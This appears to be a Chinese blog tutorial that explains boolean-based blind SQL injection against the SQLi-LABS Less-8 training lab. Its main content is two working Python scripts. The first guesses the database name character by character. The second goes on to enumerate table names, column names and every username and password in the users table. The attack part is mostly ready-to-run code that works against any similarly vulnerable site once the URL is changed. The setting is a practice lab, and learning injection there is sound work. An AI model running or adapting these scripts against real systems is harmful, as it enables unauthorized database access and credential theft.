如何用python开发自动化SQL注入脚本
当得到数据库名长度后,使用?id=1' and substr(database(),1,1)='字母'--+ 判断数据库名。print("%s数据库共有" % db_name + str(tab_num) + "张表")print("%s表下有%d个字段" % (tab_name, dump_num))# print("第%d的长度为%d"%(i,usn_len))# print("第%d的长度为
我们拿SQLi-LABS的less8来举个例子吧,初始化这样子的
那么判断数据库名,在网页localhost/Less8后输入
?id=1' and length(database())=1 --+ 输入后显示
发现报错,那么再依次判断,输入这 ?id=1' and length(database())=8 --+
到id=8的时候,返回成功,说明数据库名长度为8
当得到数据库名长度后,使用?id=1' and substr(database(),1,1)='字母'--+ 判断数据库名。这里字母输入s时,不会报错,即输入这
?id=1' and substr(database(),1,1)='s'--+
那么这么试可试出数据库名,那么如果用python写一个脚本来自动化SQL注入脚本会方便些,那么怎么操作呢
下载python,官网www.python.org
点击Downloads,选择一个版本下载
下载后打开命令提示符输入python,可知安装成功了
那么我们如果直接打开python.exe输入代码如果报错了还不知道怎么错的,那么怎么解决呢,我们可以去下载pycharm,官网的下载界面
www.jetbrains.com/pycharm/download
下载后可能会报错,比如没有装request模块,那么去装pip吧,官网地址
pypi.org/project/pip
在Download files下载tar,gz版的
下载好后在命令提示符输入pip install requests
想看看装的怎么样的可在命令提示符输入 pip list
然后我们在pycharm把这段代码输入
import requests
import string
url = "http://localhost/Less-8/"
normalHtmlLen = len(requests.get(url=url+"?id=1").text)
print("The len of HTML:"+str(normalHtmlLen))
dbNL = 0
while True:
dbNL_url = url + "?id=1'+and+length(database())="+str(dbNL)+"--+"
print(dbNL_url)
if len(requests.get(dbNL_url).text) == normalHtmlLen:
print("The len of dbName:"+str(dbNL))
break
if dbNL == 30:
print("Error!")
break
dbNL += 1
dbN = ""
for i in range(1, dbNL+1):
for a in string.ascii_lowercase:
dbName_url = url + "?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
print(dbName_url)
if len(requests.get(dbName_url).text) == normalHtmlLen:
dbN += a
print(dbN)
break
那么Run’mian’后可知数据库名为security
那么如果你们想知道其它那用pycharm这个软件run一下编辑的代码
import requests
import string
url = 'http://localhost/Less-8/'
i = 0
db_name = ''
# 猜解几张表
print("[+]正在猜解表的数量......")
tab_num = 0
while True:
payload = url + "?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+" % tab_num
res = requests.get(payload)
if 'You are in...........' in res.text:
print("%s数据库共有" % db_name + str(tab_num) + "张表")
break
else:
tab_num += 1
print("[+]开始猜解表名......")
for i in range(1, tab_num + 1):
tab_len = 0
while True:
payload = url + "?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+" % (
i - 1, tab_len)
res = requests.get(payload)
# print(payload)
if 'You are in...........' in res.text:
# print ('第%d张表长度为:'%i+str(tab_len))
break
if tab_len == 30:
print('error!')
break
tab_len += 1
tab_name = ''
for j in range(1, tab_len + 1):
for m in string.ascii_lowercase:
payload = url + "?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+" % (
i - 1, j, m)
res = requests.get(payload)
if 'You are in...........' in res.text:
tab_name += m
# print (tab_name)
print("[-]第%d张表名为: %s" % (i, tab_name))
# 尝试猜解表下字段......
dump_num = 0
while True:
payload = url + "?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+" % (
tab_name, dump_num)
res = requests.get(payload)
if 'You are in...........' in res.text:
print("%s表下有%d个字段" % (tab_name, dump_num))
break
dump_num += 1
for a in range(1, dump_num + 1):
dump_len = 0
while True:
payload = url + "?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+" % (
tab_name, a - 1, dump_len)
res = requests.get(payload)
# print(payload)
if 'You are in...........' in res.text:
# print("第%d个字段长度为%d"%(a,dump_len))
break
dump_len += 1
if dump_len == 30:
print("error!!")
break
dump_name = ''
for i in range(1, dump_len + 1):
for j in (string.ascii_lowercase + '_-'):
payload = url + "?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+" % (
tab_name, a - 1, i, j)
res = requests.get(payload)
if 'You are in...........' in res.text:
dump_name += j
# print(dump_name)
break
print(dump_name)
print("[+]开始猜解users表下的username......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:
payload = url + "?id=1'and (select count(username) from security.users)=%d--+" % usn_num
res = requests.get(payload)
if "You are in" in res.text:
# print(usn_num)#13
break
usn_num += 1
for i in range(1, usn_num + 1):
usn_len = 0
while True:
payload = url + "?id=1'and (select length(username) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
res = requests.get(payload)
if "You are in" in res.text:
# print("第%d的长度为%d"%(i,usn_len))
break
usn_len += 1
usr_name = ''
for k in range(1, usn_len + 1):
for m in char:
payload = url + "?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+" % (
i - 1, k, m)
res = requests.get(payload)
if "You are in" in res.text:
usr_name += m
break
print(usr_name)
print("[+]开始猜解users表下的password......")
usn_num = 0
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:
payload = url + "?id=1'and (select count(password) from security.users)=%d--+" % usn_num
res = requests.get(payload)
if "You are in" in res.text:
# print(usn_num)#13
break
usn_num += 1
for i in range(1, usn_num + 1):
usn_len = 0
while True:
payload = url + "?id=1'and (select length(password) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
res = requests.get(payload)
if "You are in" in res.text:
# print("第%d的长度为%d"%(i,usn_len))
break
usn_len += 1
usr_name = ''
for k in range(1, usn_len + 1):
for m in char:
payload = url + "?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+" % (
i - 1, k, m)
res = requests.get(payload)
if "You are in" in res.text:
usr_name += m
break
print(usr_name)
可知表的数量,表名,用户名以及密码
更多推荐
所有评论(0)